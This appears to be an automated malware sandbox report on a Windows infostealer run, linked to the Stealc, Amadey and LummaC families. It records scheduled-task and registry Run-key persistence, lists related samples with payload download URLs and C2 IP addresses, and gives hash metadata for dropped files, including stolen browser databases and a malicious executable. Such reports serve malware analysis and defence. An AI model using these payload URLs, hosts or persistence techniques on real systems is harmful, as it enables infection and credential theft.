                                                                                                                                        01:23:45API Interceptor3008x Sleep call for process: 550b7cfe5f.exe modified
                                                                                                                                        05:02:19Task SchedulerRun new task: axplong path: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                        06:23:36Task SchedulerRun new task: Wall path: wscript s>//B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
                                                                                                                                        06:23:36AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url
                                                                                                                                        06:24:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url
                                                                                                                                        06:24:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run c8908bf20d.exe C:\Users\user~1\AppData\Local\Temp\1001471001\c8908bf20d.exe
                                                                                                                                        06:24:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2dc588f7b5.exe C:\Users\user~1\AppData\Local\Temp\1001472001\2dc588f7b5.exe
                                                                                                                                        06:24:52Task SchedulerRun new task: skotes path: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                        06:24:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run c8908bf20d.exe C:\Users\user~1\AppData\Local\Temp\1001471001\c8908bf20d.exe
                                                                                                                                        06:25:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2dc588f7b5.exe C:\Users\user~1\AppData\Local\Temp\1001472001\2dc588f7b5.exe
                                                                                                                                        06:26:06Task SchedulerRun new task: ServiceData4 path: C:\Users\user~1\AppData\Local\Temp\/service123.exe
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        1.1.1.1PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                        • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
                                                                                                                                        AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 1.1.1.1/
                                                                                                                                        INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
                                                                                                                                        Go.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 1.1.1.1/
                                                                                                                                        185.215.113.365GP8oxUsvj.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 185.215.113.36/zenaaaretest/CPU.zip
                                                                                                                                        SecuriteInfo.com.generic.ml.7966.exeGet hashmaliciousAmadey RedLineBrowse
                                                                                                                                        • 185.215.113.36/DebasedSeptenary_2021-09-29_00-21.exe
                                                                                                                                        20.101.57.9ALVARA-072.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                          TRABALHO----PROCESSO0014S55-S440000000S1.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                            SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                              LisectAVT_2403002C_44.exeGet hashmaliciousEICARBrowse
                                                                                                                                                BraveBrowserSetup-BRV030.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  lgX7lgUL1w.exeGet hashmaliciousNeoreklami, PureLog Stealer, SmokeLoaderBrowse
                                                                                                                                                    185.215.113.16file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 185.215.113.16/mine/random.exe
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 185.215.113.16/mine/random.exe
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 185.215.113.16/mine/random.exe
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 185.215.113.16/mine/random.exe
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 185.215.113.16/mine/random.exe
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 185.215.113.16/off/def.exe
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 185.215.113.16/mine/random.exe
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 185.215.113.16/mine/random.exe
                                                                                                                                                    ykDoK8BtxW.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 185.215.113.16/steam/random.exe
                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.215.113.16/mine/random.exe
                                                                                                                                                    No context
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    2Lzx7LMDWV.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    https://my-homepagero.sa.com/exml/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    https://pdfhost.io/v/maTYQa.jg_mqfilserawxgxdgxhhgsx_1Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    VMAGE-ASRUhttp://rt.authses.onlineGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 45.148.244.222
                                                                                                                                                    file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                                                                                    • 194.116.215.195
                                                                                                                                                    Report-41952.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 193.242.145.138
                                                                                                                                                    nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                                                                                                    • 194.116.215.195
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                                                    • 194.116.215.195
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                                                                                                                    • 194.116.215.195
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                    • 194.116.215.195
                                                                                                                                                    file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                                                                                                                                                    • 194.116.215.195
                                                                                                                                                    file.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, Stealc, zgRATBrowse
                                                                                                                                                    • 194.116.215.195
                                                                                                                                                    jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                                                                                                    • 194.116.215.195
                                                                                                                                                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 185.215.113.206
                                                                                                                                                    file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                    • 185.215.113.206
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 185.215.113.16
                                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                    • 185.215.113.206
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 185.215.113.16
                                                                                                                                                    file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                    • 185.215.113.206
                                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                    • 185.215.113.206
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 185.215.113.16
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 185.215.113.206
                                                                                                                                                    file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                    • 185.215.113.206
                                                                                                                                                    No context
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                          oZ7nac01Em.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                WGo3ga1AL9.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                        C:\ProgramData\LgAmARwZ\Application.exefile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (1769), with CRLF line terminators
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):9370
                                                                                                                                                                          Entropy (8bit):5.514140640374404
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
                                                                                                                                                                          MD5:7E44458E0A8A3A7D10875BC3B7AE72D1
                                                                                                                                                                          SHA1:E5E6AC8676EE3761DAB13A10EB7573C19F48D297
                                                                                                                                                                          SHA-256:21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
                                                                                                                                                                          SHA-512:012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):51200
                                                                                                                                                                          Entropy (8bit):0.8746135976761988
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                          Entropy (8bit):1.1215420383712111
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                                                                                                          MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                                                                                                          SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                                                                                                          SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                                                                                                          SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                          Entropy (8bit):0.848598812124929
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                                                                                                          MD5:9664DAA86F8917816B588C715D97BE07
                                                                                                                                                                          SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                                                                                                          SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                                                                                                          SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                          Entropy (8bit):1.137181696973627
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                                                                                                          MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                                                                                                          SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                                                                                                          SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                                                                                                          SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5242880
                                                                                                                                                                          Entropy (8bit):0.03786218306281921
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
                                                                                                                                                                          MD5:4BB4A37B8E93E9B0F5D3DF275799D45E
                                                                                                                                                                          SHA1:E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
                                                                                                                                                                          SHA-256:89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
                                                                                                                                                                          SHA-512:F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):526848
                                                                                                                                                                          Entropy (8bit):7.806472978332927
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:NL07gVkGXreL4LV8wdljMagCkqZBtzPmmhwAoXC+YF:Nw7g6GXrnFkm1PmmBqC+YF
                                                                                                                                                                          MD5:26D8D52BAC8F4615861F39E118EFA28D
                                                                                                                                                                          SHA1:EFD5A7CCD128FFE280AF75EC8B3E465C989D9E35
                                                                                                                                                                          SHA-256:8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
                                                                                                                                                                          SHA-512:1911A21D654E317FBA50308007BB9D56FBA2C19A545EF6DFAADE17821B0F8FC48AA041C8A4A0339BEE61CBD429852D561985E27C574ECED716B2E937AFA18733
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....E..........."...0.................. ... ....@.. .......................`............@.....................................O.... ..L....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...L.... ......................@..@.reloc.......@......................@..B........................H........(...............>..............................................6.(.....(....*z.,..{....,..{....o......(....*....0...........s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s ...}.....s!...}.....("....{.... .....Ws#...o$....{....r...po%....{.... ......s&...o'....{.....o(....{.... (... ....s#...o$....{....r...po%....{.... ......s&...o'....{..
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                          Entropy (8bit):0.7067044977496362
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqa:2JIB/wUKUKQncEmYRTwh0O
                                                                                                                                                                          MD5:479BACA7F6287D1A532DA62F32D0BAEA
                                                                                                                                                                          SHA1:030D6218A1B83E4FA289ACC3992AF25154262EA8
                                                                                                                                                                          SHA-256:91D2CD05E82227EE9EE73DA0C6CE7F9753BE9CD833A50DD96272C768E5A19A29
                                                                                                                                                                          SHA-512:43193AAE54ED72A3CD9C76D17ECC6C5DD2BAE46FCC42AF0C3D786830F67CD863D631C596CB969FE34B1E9D345D1A95AEEBD8919D2AAEA4CD53E6E5CE2527919E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x859d285a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                          Entropy (8bit):0.7900035162684308
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:DSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:DazaPvgurTd42UgSii
                                                                                                                                                                          MD5:196CDE1E96CDDCB3C2D5CB090E9AC84D
                                                                                                                                                                          SHA1:92C40D46425366B0B22BBE32A7A6E8E9CB524C64
                                                                                                                                                                          SHA-256:17A7C754507FEC463D3D07DFA33E19EE97E744801D6D1D51C7167F9415B54CCB
                                                                                                                                                                          SHA-512:A0B14703CF07E02A53D5EB4FD5C5D757242C51EC2781722624FA7A667175F2C6ED52C8EE99A2CCE8B58FC48D73F591E3948993869926FFA778B244C6A5AF8F07
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..(Z... ...............X\...;...{......................0.`.....42...{5."....|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{...................................4Dr"....|...................V@("....|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                          Entropy (8bit):0.08194852548081169
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:UMl/EYewIuZstRygGqt/57Dek3JMXstltlallEqW3l/TjzzQ/t:UMl/EzBuStRygHR3tztltAmd8/
                                                                                                                                                                          MD5:F6E38635E8D272B862257E4A54DBB450
                                                                                                                                                                          SHA1:DA9AEB32CFD66F03E699C37C8038AA65DD81A6F4
                                                                                                                                                                          SHA-256:FB0E3B015E266A63E52D0D53E0CFEABB603BB83F350515998E8758A10A7518E2
                                                                                                                                                                          SHA-512:970E80CDC33E436DFAA1F250A313DE103C6430D3B0331874BA7365A9CE533025E668FF0A8D58AC3D6C385823E37090C3A3EF35A3C22B234C56249F8BA5B6D7B5
                                                                                                                                                                          Malicious:false
